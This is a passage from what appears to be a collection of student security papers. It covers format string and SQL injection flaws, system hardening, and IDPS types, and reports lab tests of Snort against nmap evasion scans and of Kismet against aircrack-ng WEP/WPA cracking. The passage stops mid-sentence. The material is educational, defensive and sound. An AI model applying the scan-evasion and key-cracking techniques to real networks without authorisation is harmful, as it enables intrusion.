printf(string_from_untrusted_user);
By using the format specifier “%x” in a format string that is input into the program,
the attacker can inspect the program stack 4 bytes at a time. Another format specifier
with a potentially dangerous function is “%n”. Using this particular format specifier,
the attacker is able to write 4 bytes to the stack11. Thus using a combination of the two
format specifiers, the attacker can insert his own code into the stack to be executed or
replace a return address to point to some other code in the system.
During code review, one could simply check for the misuse of the formatted
output printing function. Static code analysers such as Splint, mentioned above, are
also able to detect improper usage of the functions. Negative testing can also be used
in black box situations where code is unavailable. Testers can simply pass potentially
unsafe formatting specifiers such as the “%x” C vulnerability detailed above and
check if hexadecimal values are returned.
3.2.2 SQL Injections
Nowadays, it is common to find programs organize their data through SQL, a portable
database library. This opens up a new way to exploit a program that does not properly
validate user input.
For example, a program may ask the user for authentication before displaying
sensitive data. If the program uses SQL to check for user credentials but fails to
validate the input, a successful SQL injection attack may allow the attacker to gain
unauthorized access to the sensitive data. Suppose the program asks for the user’s
name and password and saves it into the variables $name and $password, and
concatenates information provided with a string literal to construct the following SQL
statement to pass on to the SQL interpreter, “Select * from user where name=$name
and password=$password”. This use of string concatenation allows the attacker to
pass his own SQL queries to the system to be executed. With a little guesswork, the
attacker will be able to access, modify and delete data on the database.
When doing a code review portions of code that hold to the following pattern
is vulnerable to SQL injection. The code, takes user input, does not validate the input,
261
uses the input directly to query the database and uses string concatenation to build the
SQL query. Negative testing by supplying malformed inputs to the program also
reveal if the program is vulnerable to such an exploit. Of course, all of this only
applies to code that interfaces with a database, any program that does not will be
obviously free of such vulnerabilities.
4
4.1
Other methods to ensure that programs do not damage the
system
Checking if the program is run with the lowest possible privileges
Programs such as web servers or daemons should always be running under the lowest
possible privilege levels. This will reduce the damage if the program has been
compromised by malicious attacks. For example, the Apache HTTP Server can be
configured such that it refuses to start if it detects it is being run with administrator
privilege, because a restricted user privilege is sufficient for the server to perform its
tasks. By ensuring a program implements such privilege check, it helps reduce the
damage to the system, should an attack be successful.
4.2
Running the program in a sandbox
Sandbox is a common mechanism of separating the program from the actually system.
It is a specific example of virtualization. Its usage is widespread among all major antivirus software for detection of malicious programs. By running the program inside a
sandbox, the resources the program uses is tightly controlled by the sandboxing
software. Therefore, when the running program is compromised by attacks, the
damage will not extend beyond the sandbox and can be easily identified for further
analysis.
A typical example of a sandbox for vulnerability testing is to launch the
program inside virtual machine software like Oracle VirtualBox. It will closely
monitor the system resources utilized, I/O pattern and network access and so on. With
the statistics collected from the running program, the access pattern can be analyzed
and any suspicious behaviour will be identified.
4.3
Checking If the System Uses Data Execution Prevention
Many modern operating systems such as Microsoft Windows has a security feature
called Data Execution Protection12, and it prevents the data section of a protected
program from being executed. Because a typical buffer overflow attack always
involves overwriting the data section of the victim program with malicious
262
instructions and tricking the victim program into jumping into these instructions,
ensuring that the program under testing utilizes this technology greatly reduces the
chance of a successful attack on the program.
4.4
Checking That
Randomization
the
System
Uses
Address
Space
Layout
Another security feature common to modern operating systems is Address Space
Layout Randomization. It randomizes the address of system data structures and the
position of system libraries in processes address space. This complicates remote code
execution and as a result, a malicious attacker trying to inject code will have a hard
time predicting the address of system library or accessing system data structures.
Furthermore a wrong prediction of the address will almost always crash the attack
process every time; therefore making it impossible for the attacker to try another
address prediction. For example13, since Windows Vista introduced ASLR, many
attack techniques that used to work well in Windows XP will only have a chance of 1
in 256 to work on the new system. Any trial on the other 255 wrong memory
locations will crash the attacked process, preventing the attack from trying other
possibilities as well as alerting users of the unusual crashing behaviour that might lead
to the discovery of the attacker.
4.5
Ensuring That the Program Does Not Use Injected Compromised
Code By Mistake
A common technique to inject malicious code is through loading of unintended
dynamic library. For example on Windows, a malicious program will inject a
carefully crafted DLL (Dynamic-Link Library) into the address space of the victim
process so that the attacking program will reside in the same address space. i.e. it has
access to all the data structures and is able to perform arbitrary operations at the
privilege level of the victim process. In an article14 written by Robert Kuster, the
author describes 3 ways to inject foreign instructions into a target process in detail.
Amongst the three methods, namely Windows Hook, CreateRemoteThread &
LoadLibrary and CreateRemoteThread & WriteProcessMemory, two of them are
achieved through the use a custom DLL. Therefore if a program does not check for
suspicious loaded libraries during run-time, it could easily leak sensitive data to the
attacker or run arbitrary injected code at its current process privilege and hence
potentially damage the rest of the system.
One way to prevent code injection through foreign libraries is to keep a
whitelist of the names and hash of the authorized libraries the program intends to use.
And in the event of a library being loaded, the program can check whether it is
263
authorized by looking up the whitelist so it can immediately unload the unauthorized
library.
5
Conclusion
The methods and techniques we have investigated are by no means exhaustive and the
myriad of vulnerability detection and prevention techniques seem to be only limited
by a reviewer’s time and patience. Thus we have only chosen the ones that we have
decided to be the most relevant to this course. As more and more commercial code is
written, new attack vectors are continuously being discovered and an equal number of
mitigation techniques end up being proposed and developed. We also note that none
of the techniques, indeed no single technique ever is, are by any means magic bullets
capable of securing a program or system. A combination of vulnerability detection
and mitigation should be always be used to secure systems and the programs running
on them.
264
References
1.
2.
3.
4.
5.
6.
7.
8.
9.
10.
11.
12.
13.
14.
Pfleeger, S., and Hatton, L. "Investigating the Influence of Formal Methods." IEEE
Computer, v30 n2, Feb 1997.
Jones, T. Applied Software Measurement, McGraw-Hill, 1991.
Johnson, S. Lint, a C program checker. Computer Science Technical Report 65, Bell
Laboratories, December 1977.
Beizer, Boris. Software Testing Techniques, van Nostrand Reinhold, 1990
B.P. Miller, D. Koski, C.P. Lee, V. Maganty, R. Murthy, A. Natarajan, and J. Steidl,
"Fuzz Revisited: A Re-examination of the Reliability of UNIX Utilities and
Services", Computer Sciences Technical Report #1268, University of WisconsinMadison, April 1995.
ISO/IEC 9899 International Standard. Programming Languages – C. December 1999.
Approved by ANSI May 2000.
http://www.gnu.org/software/libc/manual/html_node/Copying-andConcatenation.html
http://www.gnu.org/software/libc/manual/html_node/Formatted-OutputFunctions.html
David Larochelle and David Evans. 2001. Statically detecting likely buffer overflow
vulnerabilities. In Proceedings of the 10th conference on USENIX Security
Symposium - Volume 10 (SSYM'01), Vol. 10. USENIX Association, Berkeley, CA,
USA, 14-14.
http://www.dwheeler.com/essays/write_it_secure_1.html
http://www.gnu.org/software/libc/manual/html_node/Table-of-OutputConversions.html
A detailed description of the Data Execution Prevention (DEP) feature in Windows
XP Service Pack 2, Windows XP Tablet PC Edition 2005, and Windows Server 2003
http://support.microsoft.com/kb/875352
http://netsecurity.about.com/od/quicktips/qt/whatisaslr.htm
Three
Ways
to
Inject
Your
Code
http://www.codeproject.com/KB/threads/winspy.aspx
265
into
Another
Process
266
Intrusion and Prevention System Analysis
Tran Dung – U096942M, Tran Cong Hoang – U096948
Abstract. Intrusion detection is the process of monitoring and analyzing a computer system or
network for potential incidents, which include threat or violation of securities policies or
practices. Nowadays when most networks are interconnected, attackers can easily exploits
many system's vulnerabilities and make use of them to attack these systems. Detecting,
recording and deterring these actions become more and more important, and therefore,
Intrusion detection and prevention systems (IDPS) are becoming increasingly essential to any
system' security suites.. In this research, we will discuss about several types of IDPS (e.g.
components, capabilities). In the end, we will also survey a range of available intrusion
detection systems, each from a different category, by carrying out several sample attacks on our
systems, and analyze the results collected.
1
Introduction
Intrusion detection and prevention system (IDPS) is software which is capable of
monitoring a network or a machine to detect malicious activities and performing
certain actions to stop possible incidents.
Every IDPS has the following typical components:
 Sensor or Agent. The responsibility of this device is to monitor and optionally
analyze activities.
 Management server. This device’s main responsibility is to perform analysis on
received information from all Sensors or Agents, sometimes in a way that each
individual Sensor or Agent cannot do. For example, it can detect correlation which
is the relationship among event information from multiple Sensors or Agents (e.g.
packets from the same IP source, etc.).
 Database server (usually optional). This device simply store information.
 Console. This program is an interface for IDPS’s administrators to perform admin
works such as configuring Sensors/Agents, updating IDPS, etc.
Currently, there are a lot of intrusion detection systems available, such as
Snort, Kismet or Ossec. There are two main ways to categorize them: according to
their detection methods (Signature-based detection, Anomaly-based Detection,
Stateful Protocol Analysis), or according to the way they are deployed and the events
they monitor: Network-based, Wireless, Network Behavior Analysis and Host-based.
In the following parts, we will follow the latter way of categorizing to analyze current
IDPS technology. Besides, we will also focus only on the Sensor/Agent component of
each type of IDPS since it is the main feature that distinguishes different types of
IDPS from each other. In addition, high-level descriptions of the capabilities of each
type of IDPS will also be discussed.
267
2
2.1
Network-based IDPS
Introduction
Network-based is the type of IDPS that monitors and analyzes network activity on
one or more network segments for suspicious activity. It is often deployed at
boundaries between networks, (such as positions near border firewalls or border
routers.
2.2
Sensors
Each IDPS sensor monitors traffic on one or more network segments. They are
deployed on network interface cards that are placed into promiscuous mode, which
means that they will accept all incoming packets that they see on the network,
regardless of the destination. Most IDPS use multiple, some even use hundreds of
sensors. The sensors could belong to either one of two types: software only or
appliance. The former means only a software solution is provided, while the latter
means this sensor comprises hardware, software and even a specialized hardened OS.
The appliance type is optimized for the sensor task, so it's much more capable than
the software only solution.
The sensors could be deployed in one of two modes: inline or passive mode.
The inline mode means the sensor is deployed so that all traffic it monitors must pass
through it, while the passive mode means the sensor only monitors on the copy of the
traffic. The inline sensors are often placed directly on some special places in the
network flow, at the division between networks (similar to firewalls), such as: border
of connection between external and internal networks. The passive sensors are
deployed with the usage of either spanning port or network tap. The spanning port is a
special port of the switch where it can see all packet passing through the switch, so
when the sensor is connected to this port, it can receives copies of traffic going
through the switch and monitors them. The network tap is a special device which
connects the sensor to the network, and it provides the sensor with a copy of packets
going through the network. Passive sensors can also receive copied packets indirectly,
which are sent from an IDS load balancer that aggregates packets copy and distributes
them between passive sensors.
2.3
Security capabilities
Detection capabilities. Traditionally, network-based IDPS uses signature-based
detection for detecting threat. This method means the IDPS will compare the content
of each item (network packet or log entry) against known threat patterns (mostly
using simple comparison method) to identify possible threats. For example: an email
containing an attachment file .exe could possibly carry a malware or virus. This
method is effective at identifying known threats, but it has a major weakness which is
to be very ineffective against unknown threats, or threats that make use of evading
268
techniques. The types of event which are common discovered by network-based IDPS
include the following:
 Application layer attacks (e.g., banner grabbing, format string attacks, password
guessing, malware transmission, etc). Several application protocols such as DHCP,
HTTP, FTP, etc… can be analyzed.
 Transport layer attacks (e.g., port scans, unusual packet fragmentation, SYN
floods, etc.). The most commonly analyzed transport layer protocols are TCP and
UDP.
 Network layer attacks (e.g. spoofed IPs, illegal IP headers, etc.). The most
commonly analyzed transport layer protocols are ICMP, IPv4 and IGMP. Some
network-based solutions also support IPv6 protocols.
 Unexpected application services (e.g., tunneled protocols, backdoors, etc.). These
threats can be detected using Stateful Protocol Analysis or Anomaly-based
methods.
 Policy violations (e.g. blacklisted Web sites or application protocols, etc.)
Even though network-based IDPS can discover a wide range of malicious
activities, they do have a number of serious limitations. One of the most important
one is that it has little understanding of many network protocols and cannot track the
state of complex communications. For example, many IDPS using this method cannot
pair a request with the corresponding response, or remember previous requests when
processing the current request. This prevents signature-based detection methods from
detecting attacks that comprise multiple events if each event does not clearly signal an
attack. Since network-based IDPS often needs to monitor a huge amount of traffic,
and because of the inherent problems with this detection method, this type of IDPS
often generates many false positives, as well as false negative.
Newer network-based IDPS use a combination of detection methods
(Signature-based analysis, Stateful Protocol Analysis, etc.) to increase the accuracy of
their detection, as well as reduce the number of false alerts and false positives.
3
3.1
Wireless IDPS
Introduction
According to figures published on the website of CTIA (The Wireless Association),
as of June 2011, there are around 327.6 million wireless subscribers in the U.S alone.
It is clear that Wireless technology has been revolutionizing the way we work and
live. Wireless solutions such as Radio Frequency Identification (RFID) tags, for
instance, are improving luggage operations at many airports, while everyone is able to
send and receive emails from their mobile devices.
As wireless technology has gained popularity, so have attacks against them. In
fact, wireless networks are not only vulnerable to TCP/IP based attacks which are
native to wired networks; they also suffer from a wide range of 802.11 specific
threats. Unfortunately, traditional IDPS solutions are at times unable to detect or
prevent attacks of the latter kind. The reason is that traditional IDPS concentrate more
269
on layer 3 and above threats. This implicit trust of layer 1 and layer 2 results from the
fact that to get access to the cables or data points of a wired network, attackers must
either defeat the physical security (e.g. guards, locks) or in various cases, be an
employee. However, wireless technology brought about a new situation. To be
precise, wireless networks are not only susceptible to all the same attacks at layer 3
and above but they are also vulnerable to a many threats at layer 1 and layer 2. This is
unavoidable because the technology uses electromagnetic spectrum in the radio
frequency range as the medium over which computers gain access to the network. In
other words, layer 1 and layer 2 can be easily affected by anyone within the radio
frequency range of the network and traditional IDPS usually does not monitor for
these kinds of threats.
For some time, WLAN had had very poor security on a wide open medium.
However, as new improved encryption schemes were invented, traditional IDPS has
also been improved to help tackle this problem. In the following parts, we will focus
on the sensors of wireless IDPS and at then discuss the security capabilities of the
technology.
3.2
Sensors
The main components in a wireless IDPS are pretty much the same as a networkbased IDPS: consoles, sensors, management servers and database servers (optional).
Other than the sensors, all of the components perform essentially the same roles for
both kinds of IDPS. In a wireless IDPS, sensors have the same basic functionalities as
network-based IDPS sensors. However, because of the complex nature of monitoring
wireless communications, wireless sensors function quite differently.
Unlike its network-based cousin which can monitor all packets on the network,
a wireless IDPS works on samples of traffic. There are several frequency bands to
monitor and each band is divided into many channels. Since it is not possible to
monitor all packets on a band at the same time, a sensor must handle a single channel
each time. As a matter of fact, the longer a sensor stays on a channel, the more likely
it would miss malicious activity happening on the other channels. Typically, a sensor
is configured to jump among channels very frequently such that it can monitor a
channel a few times per second. In many systems, specialized sensors which have
several radios and high-power antennas, with each pair of radio & antenna monitoring
a different channel, are being used. Some IDPSs further coordinate scanning activities
among its sensors with overlapping ranges so that each sensor doesn’t have to monitor
too many channels.
In general, there are 3 main types of wireless sensors:
 Dedicated. Dedicated sensors usually function passively in a radio frequency
monitoring mode to sniff wireless traffic. Some dedicated sensors would perform
analysis on their own while the other would simply forward the received packets to
the management server. One important characteristic of dedicated sensors is that
they do not pass packets from source to destination.
 Bundled with an Access Point (AP). Several manufacturers have added IDPS
functionalities to their products. A bundled AP may provide weaker detection
capability because it has to switch back and forth between monitoring the network
270
for threats and providing network access. If only a single band or channel is
required to be monitored, bundled APs would provide acceptable security and
network availability.
 Bundled with a Switch. This solution is similar to a bundled AP. However,
wireless bundled switches are usually not as good as bundled APs or dedicated
sensors at detecting threats.
Because of the nature of wireless technology, choosing where to put sensors
for a wireless IDPS is a fundamentally different issue than choosing that for any other
types of IDPS. In general, wireless sensors should be deployed such that they can
cover the whole radio frequency range of the WLANs. At times, to detect rogue APs
and ad-hoc WLANs, sensors are also located where there should be no wireless traffic
as well as configured to monitor channels or bands that should not be used.
3.3
Security capabilities
Detection capabilities. Wireless IDPS do not analyze communications at high level
(e.g. IP addresses, etc.). Instead, they focus on the lower IEEE 802.11 protocol
communications and are capable of detecting misconfigurations, attacks and
violations of policy at WLAN protocol level.
As a matter of fact, wireless IDPS can detect a wide range of malicious events.
The most commonly detected types of events include the following:
 Unauthorized devices. Using the information gathering capabilities, most wireless
IDPS are capable of detecting unauthorized WLANs, rogue APs and unauthorized
stations.
 Poorly secured devices. Again, using the information gathering capabilities, most
wireless IDPS can sort out APs and stations which are misconfigured or are using
weak WLAN protocols or protocol implementations.
 Unusual usage patterns. Some sensors can adopt anomaly-based detection
methods to sort out unusual usage patterns.
 Wireless network scans. At times, attackers use scanners to discover unsecured or
poorly secured WLANs. Wireless sensors can effectively detect the use of such
scanners in the network, provided that these scanners generate some wireless
traffic during the scanning process. As a matter of fact, wireless sensors are not
capable of detecting passive devices which only monitor and analyze observed
traffic.
 Denial of service (DoS) attacks and conditions. Wireless IDPS can usually detect
DoS attacks using Stateful Protocol Analysis and Anomaly-based detection
methods, which can check if observed amount of traffic is consistent with the
expected amount. At times, DoS attacks can be discovered by simply counting the
number of events during periods of time and alerting when this number exceeds the
threshold.
 Impersonation and man-in-the-middle attacks.
Most wireless sensors can further determine the physical location of the
attacker by approximately estimating the attacker’s distance from multiple sensors
and then calculating the coordinates.
271
Compared to other types of IDPS, due to its limited scope (analyzing wireless
protocols), wireless IDPS is, in general, more accurate. False positives are most likely
produced by anomaly-based detection methods, especially if threshold values are not
well configured.
On the other hand, wireless IDPS do have some serious limitations such as
being unable to detect certain wireless protocol threats, etc… One of the most
important limitations of wireless IDPS is being vulnerable to evasion techniques and
being susceptible to attacks against the IDPS themselves. The same DoS attacks (both
physical and logical) which aim to disrupt WLANs can also affect the sensors. For
example, an attacker can try to get close to sensors which locate at public areas (e.g.
hallways, etc.) and secretly jam them.
Prevention capabilities. Wireless sensors usually offer 2 types of prevention
capabilities:
 Wireless. Some sensors are capable of sending messages through the air to the end
points, telling them to terminate connections with a rogue or misconfigured station
or AP.
 Wired. Some sensors are capable of instructing switches on the wired network to
block traffic involving a specific AP or station based on the device’s switch port or
MAC address.
One important point to note is that while a sensor is sending signals to
terminate connections, it may not be able to continue its monitoring functions until
the prevention action is finished. To solve this issue, some sensors were built with 2
radios – one for monitoring and the other for enforcing prevention actions.
4
4.1
Network Behavior Analysis IDPS
Introduction
Network Behavior Analysis (NBA) IDPS is the type of IDPS that examines and
analyzes network traffic to identify threats that generate unusual traffic flows, such as
distributed denial of service (DDoS) attacks, certain forms of malware, and policy
violations.
4.2
Sensors
Similar to other types, NBA IDPS is often comprised of sensors, consoles and
optionally management server. They are often deployed as an appliance (both
software and hardware in a solution). Some NBA IDPSs monitor the network directly,
just like network-based IDPS. Others do not monitor directly, but rather monitor the
flow data provided by routers or networking devices (such as NetFlow flow data,
provided by Cisco routers).
Just like network based IDPS, NBA IDPS could be integrated into the
organizations' standard networks, or they could be deployed using a separate
272
management network. Similar to network-based IDPS' sensor that could be deployed
in inline or passive mode, NBA IDPS could also be deployed in these two modes.
However, most NBA IDPS is often deployed in passive mode, also with the help of
devices such as switch spanning port or network tap. They are often deployed at
special network locations, such as border between network segments or at important
network segment. The minority which is deployed in inline mode is deployed between
the firewall and the Internet border router to deal with incoming attacks that could
overwhelm the firewall.
4.3
Security capabilities
Detection capabilities. Since NBA IDPS is used to examine network flow, the
detecting mechanism of NBA IDPS is often based on anomaly-based detection, along
with some stateful protocol analysis techniques, rather than using any signature-based
detection capability. Anomaly-based detection means the NBA IDPS will try to
generate a profile about what is considered normal behavior, and then compare the
behaviors observed in the network flow with that normal profile to detect anomalous
behaviors. When it's first deployed, it will undergo a training period to gather
information about normal usage of user in the networks to build up its profile. After
the training period, the profiles could be fixed (static ones), or adjusted constantly as
the additional events are observed (dynamic ones). The static profiles have a problem
that it needs to be changed periodically, because the network conditions keep
changed. The dynamic profiles do not suffer this same problem, but it is susceptible to
being poisoned by attacker: the attackers can perform small operations continuously
until the profiles are updated and include malicious behaviors.
Since NBA IDPS are based mainly on network flow data and anomaly-based
detection, they are most effective and accurate when dealing with attacks that
generate a large amount of network traffic: such as DoS and DDoS attack. As
mentioned, they have several weaknesses when dealing with small scale attack over a
long time. If there sensitivity is increased, so that they could detect smaller scale
attacks, it could lead to an increase in the number of false negative, in which they
mistakenly detect harmless changes to the network (such as network upgrade, a host
change location, etc...) as potential threats. The detection accuracy could also vary
overtime, and periodical updating on their profiles are required to maintain their
detection efficiency.
In additions, NBA IDPS also suffer from some other limitations. One of the
most important limitations is the delay in their detection. For many IDS of this type,
since they have to wait for data flowing from routers to reach them and wait until the
anomaly reaches a certain level, there exists an inherent delay in their detecting
capability. It could be small delay (1-2 minutes), but could also be long delay (10-15
minutes). Sometimes, it's too late to detect an attack when that attack has already been
damaging the system.
Some of the commercial Network Behavior Analysis Intrusion detection and
prevention systems available are Cisco Guard, Cisco Traffic Anomaly Detector by
Cisco Systems (http://www.cisco.com/en/US/products/hw/vpndevc/index.html),
Arbor
Peakflow
X
by
Arbor
Networks
273
(http://www.arbornetworks.com/products_x.php), OrcaFlow by Cetacean Networks
(http://www.orcaflow.ca/features-overview.php)...
5
5.1
Host-based IDPS
Introduction
In the IDPS family, host-based IDPS is the eldest brother who was the first to be
developed and implemented. Originally, its mission was to protect the mainframe
computer where communication with the outside world was infrequent.
Typically, a host-based IDPS will be directly installed on a computer system.
After the IDPS was successfully deployed, it would monitor the state of the host as
well as all events occurring within that host for malicious activities. Some examples
of what a host-based IDPS might monitor are system logs, changes of files and
directories, running processes, system and application configuration changes, wired or
wireless traffic (only for that host). Since the protected system usually resides on the
trusted side of the network, host-based IDPS are, in fact, close to the internal
authenticated users. This advantage inevitably resulted in their highly effective
capability of detecting insider threats such as disgruntled employees and corporate
spies. If one of these users attempt to perform unauthorized actions, host-based IDPS
will be able to detect and collect the most relevant information in the quickest
possible manner.
On the down side, if there are some hundreds or thousands of endpoints in a
big network, collecting and aggregating separate particular machine information for
each individual computer may not be very efficient and effective. Moreover, if an
attacker managed to successfully turn off the data collection function on a machine,
the host-based IDPS on that computer may become useless if there is no backup.
In the following section, we would discuss the agent which is one of main
components of host-based IDPS and then, study the security capabilities of the
technology.
5.2
Agents
Just like its siblings, a host-based IDPS’s main components include: consoles,
management servers and database servers (optional). However, instead of using a socalled sensor, host-based IDPS have detection software called agents installed on the
machines of interest (e.g. critical hosts such as publicly accessible servers and servers
containing important data). Each agent will monitor activity on a single host and
transmit data to a management server for analyzing. At times, agents will also
perform certain prevention actions if required.
As a matter of fact, instead of installing agents on individual machines, many
host-based IDPS use dedicated gadget running agent software. Each gadget is
configured to monitor traffic involving a specific host. Technically, this type of IDPS
is more like a network-based IDPS. However, instead of monitoring the whole
network, they concentrate on a particular machine. Besides, since these gadgets also
274
function in the same or similar ways as the host-based agents, IDPS products using
gadget-based agents are usually considered host-based. In certain cases such as
normal agents negatively affecting the performance of the monitored host, gadgetbased agents prove to be quite necessary.
To provide IDPS capabilities, most agents will use shim, which is a layer of
code put between existing layers of code, to capture and analyze data at a point where
it would be transmitted between 2 pieces of code. On the other hand, there are also
agents which do not use shim. Although these types of agents are less intrusive to the
host, they tend to be less effective at detecting malicious activities and often do not
have prevention capabilities.
Typically, agents are designed to monitor one of the following:
 A server. Common applications can also be monitored together with the operating
system.
 A client station. Agents of this type usually monitor the user’s operating system as
well as common applications such as browsers or email clients.
 An application service. Some agents only monitor particular application service
such as a Web server program. They are usually called application-based IDPS.
5.3
Security capabilities
Detection capabilities. Depend on the techniques that host-based IDPS employ,
the types of events detectible by them vary widely. Some commonly used techniques
include the following:
 Code analysis. A number of techniques of this type are quite useful at detecting
malware and can also prevent threats such as those that would permit unauthorized
code execution or escalation of privileges. Agents may analyze attempts to execute
code by using one of the following techniques:
 Code behavior analysis. Before a code is brought into the production
system, it can first be analyzed in a sandbox environment to look for
malicious behaviors by comparing to profiles or rules of known good and
bad behaviors.
 Buffer overflow detection. Attempts to perform stack/heap overflow attacks
can be discovered by searching for typical characteristics such as certain
sequence of code, etc.
 System call monitoring. Most agents have sufficient knowledge to decide
which applications or processes should call which other applications or
processes or perform what actions. For example, agents can forbid certain
drivers from being loaded which can prevent the threats from rootkits, etc.
 Application and library lists. An agent is capable of forbidding users or
processes from loading certain (version of) applications and libraries.
 Network traffic analysis. Some host-based IDPS can analyze both wired and
wireless traffic. This technique also allows them to extract files sent by
applications such as email clients, etc… to look for malware.
 Network traffic filtering. Agents often set up a host-based firewall to sort out
certain incoming/outgoing traffic for each application on the host.
275
 Filesystem monitoring. One important thing to note about techniques of this kind
is that some host-based IDPS base their monitoring on filenames. In other words, if
an attacker changes filenames, these techniques may be useless. In general,
common techniques include the following:
 File integrity checking. Agents usually periodically generate message
digests or checksums for critical files and compare them to identify changes
that have already been made by Trojan horse, etc.
 File attribute checking. Agents also routinely check the attributes (e.g.
ownership, permissions, etc.) of important files to identify changes that
have already been made.
 File access attempts. Any agents using filesystem shims can detect and stop
all malicious attempts to access important files.
 Log analysis. Most agents can analyze OS and applications’ logs to look for
malicious activities.
 Network configuration monitoring. Some agents are capable of monitoring a
machine’s current network (including wired, wireless, virtual private network, etc.)
configuration and discover any changes made to it.
One important point to note is that because a host-based IDPS is located
directly on top of a machine, it can go deeper into that particular system’s details to
dig out information that its sibling IDPS may not be able to. This advantage resulted
in several unique strengths of host-based IDPS:
 Attack verification. Since the host-based IDPS has direct access to a wide range
of logs containing critical information about events that have actually occurred, it
can easily check if the attack or exploit was successful or would succeed if not
stopped. Based on the latter knowledge, adequate prevention actions can be
selected alerts can be assigned proper priorities.
 Encrypted and Switched environments. In a switched network, there may be
numerous segments or separate collision domains. Since Host-based IDPS’s
siblings like network-based IDPS can only monitor one segment at a time, it may
be difficult for them to achieve the required coverage. As for encryption, if packets
are encrypted with certain types of encryption schemes, host-based IDPS’s siblings
may be blind to certain threats. Host-based IDPS are, on the other hand, generally
immune to these problems. To overcome switching issue, host-based IDPS can be
installed on as many critical hosts as needed. Besides, since encryption has no
impact on what were recorded in the logs, host-based IDPS will be able to detect
threats regardless of the encryption schemes being used.
 No additional hardware. If gadget-based agents are not required, no additional
hardware would be needed to run the host-based IDPS. This can results in great
cost saving from maintenance and management.
The accuracy of detection is quite challenging for host-based IDPS because a
number of detection techniques employed such as log analysis is not aware of the
context under which correctly detected events happened. For example, a machine may
be restarted or has new application installed. These activities could be malicious in
nature or they could be normal operations such as maintenance. In general, if a host-
276
based IDPS employs a bigger range of techniques, it would be able to receive more
information about the occurring events. As a result, the IDPS can have a clearer
picture of the situations and tends to deliver more accurate detection.
Just like their siblings, host-based IDPS do have their own significant
drawbacks. One of the most important issues is the delay of alerts. Even though alerts
are generated as soon as malicious attempts are discovered, these attempts have
usually already happened. Another limitation involves the usage of host resources
(e.g. memory, processor, storage). At times, agents’ operations, especially the shims,
can slow down the host’s processes. Besides, installing an agent can cause existing
host security controls (e.g. firewalls, etc.) to be disabled if those controls are
determined to function similarly to the agent.
Prevention capabilities. In general, most of the techniques employed by hostbased IDS/IPS to detect threats can also help prevent malicious attempts from being
successful. For example, a code analysis technique can prevent code (e.g. malware,
etc.) from being executed. Another example is that filesystem monitoring techniques
can help prevent critical files from being accessed, modified, replaced or deleted,
which could effectively solve malware, Trojan horse, etc… issues.
On the other hand, some of the techniques like log analysis cannot help
prevent malicious activities because they can only discover harmful events after they
have already happened.
6
Our experiments
6.1
SNORT (a network-based system)
In the first experiment, our system under test is a Windows 7 box, running Windows 7
profession version and SNORT is the IDS that is being tested.
Port scans. To perform the attack, we used the popular port scanning program: nmap
(). We carried out two series of scan. Each series used three different scan methods:
scan for open port (using options: -Pn), scan for OS detection (using -O), scan for
services and application version detection - using options: -sV). For the first series,
the scans were performed without using any detection evasion techniques. For the
second series, we tried to use different avoiding techniques, including:






Fragmenting the packet using-f.
Setting the MTU (maximum transmission unit) using –mtu.
Using random data length (--data-length).
Using decoy host with –d.
Reducing the sending speed (using -T).
Idle scanning.
277
The result is presented in the following table:
# Target
for
detecting
1 Open port
Option
Succeeded
Alerted
Alert type
-Pn
Evasion
technique
N/A
Yes
Yes
OS
-O
N/A
Yes
Yes
Services and
apps version
-sV
N/A
Yes
Yes
2 Open port
-Pn
Using
TCP
Syn scan –sS
Yes
Yes
Open port
-Pn
Using decoy –
D
Yes
Yes
Open port
-Pn
Yes
Yes
Open port
-Pn
Yes
Yes
Open port
OS
-Pn
-O
No
Yes
N/A
Yes
Services and
apps version
-sV
Yes
Yes
OS
and
Services and
apps version
-O -sV
Setting packet
fragment and
MTU: -f mtu
Mixed
of
previous
techniques
Idle scan -sI
Mixed
of
previous
techniques
Mixed
of
previous
techniques
Mixed
of
previous
techniques
PSNG_TCP_PORTSWEEP [**]
[Classification:
Attempted
Information Leak] [Priority: 2]
PSNG_TCP_PORTSWEEP [**]
[Classification:
Attempted
Information Leak] [Priority: 2]
PSNG_TCP_PORTSWEEP [**]
[Classification:
Attempted
Information Leak] [Priority: 2]
PSNG_TCP_PORTSWEEP [**]
[Classification:
Attempted
Information Leak] [Priority: 2]
PSNG_TCP_PORTSWEEP [**]
[Classification:
Attempted
Information Leak] [Priority: 2]
PSNG_TCP_PORTSWEEP [**]
[Classification:
Attempted
Information Leak] [Priority: 2]
Yes
Yes
PSNG_TCP_PORTSWEEP [**]
[Classification:
Attempted
Information Leak] [Priority: 2]
N/A
PSNG_TCP_PORTSWEEP [**]
[Classification:
Attempted
Information Leak] [Priority: 2]
PSNG_TCP_PORTSWEEP [**]
[Classification:
Attempted
Information Leak] [Priority: 2]
PSNG_TCP_PORTSWEEP [**]
[Classification:
Attempted
Information Leak] [Priority: 2]
Analysis. From the table, we can see that Snort can detect almost all types of common
port scanning, even when the scanning is performed using evasion techniques. The
source of the attack is detected in all cases. The theoretically stealthiest type of
scanning (idle scanning) is quite hard to carry out, since it requires the sequence
number of the idle host to be incremental, which is not very likely to happen
nowadays. We tried this attack for several hours without success.
278
From this experiment, we can see that in a simple environment, for personal
use, Snort can perform flawlessly against port scanning techniques. However, in real
business environment, when the number of packets flowing through the network
could be millions or even billions per seconds, the chance of an IDPS system like
Snort missing out potential harmful packet is still possible. Therefore, scaling up the
IDS system to suite the organization's need is really important to ensure security for
the system.
6.2
Kismet (Wireless intrusion detection system)
In our tests, we tried to carry out some attacks on some WEP and WPA keys
encryption wireless network. The program used to carry out the attack is a program
that is very popular in cracking wireless key: aircrack-ng (www.aircrack-ng.org/). The
Wireless IDPS used here is Kismet (www.kismetwireless.net/).
To perform the attack, we use a host machine to broadcast a Wireless Ad hoc
networks, with some different password scheme: WEP - 5 chars key, WEP - 13 chars
key, WPA - 8 chars key (common words), WPA - 8 chars key (mixed of characters).
The IDS host runs Linux Ubuntu 11.10, with the Wireless interface card put in
Monitor mode, and runs Kismet.
The attacking machine runs Linux Ubuntu 11.10, with Aircrack-ng and Macchanger
installed.
For WEP cracking, we tried to perform the attack in 2 modes: passive modes
(where the attacker only captures broadcasted packets from the AP, and tries to brute
force the key using a statistical method), and active mode (where the attackers
actively generates bogus packets to the AP, to force the AP broadcast more packets,
and increase the speed of finding the key.
It is known that for average, to crack 64 bit encryption WEP (length 5 keys), it
requires about only 50,000-200,000 captured. For 128 bit encryption (length 13 keys),
the secure level is not much better, when the attacker only need to capture about
200,000 – 700,000 encrypted data frames to crack the key.
The result of the attack could be summarized as follow:
 For WEP key:
 Passive attack. The time required to crack the key is based on luck. On our
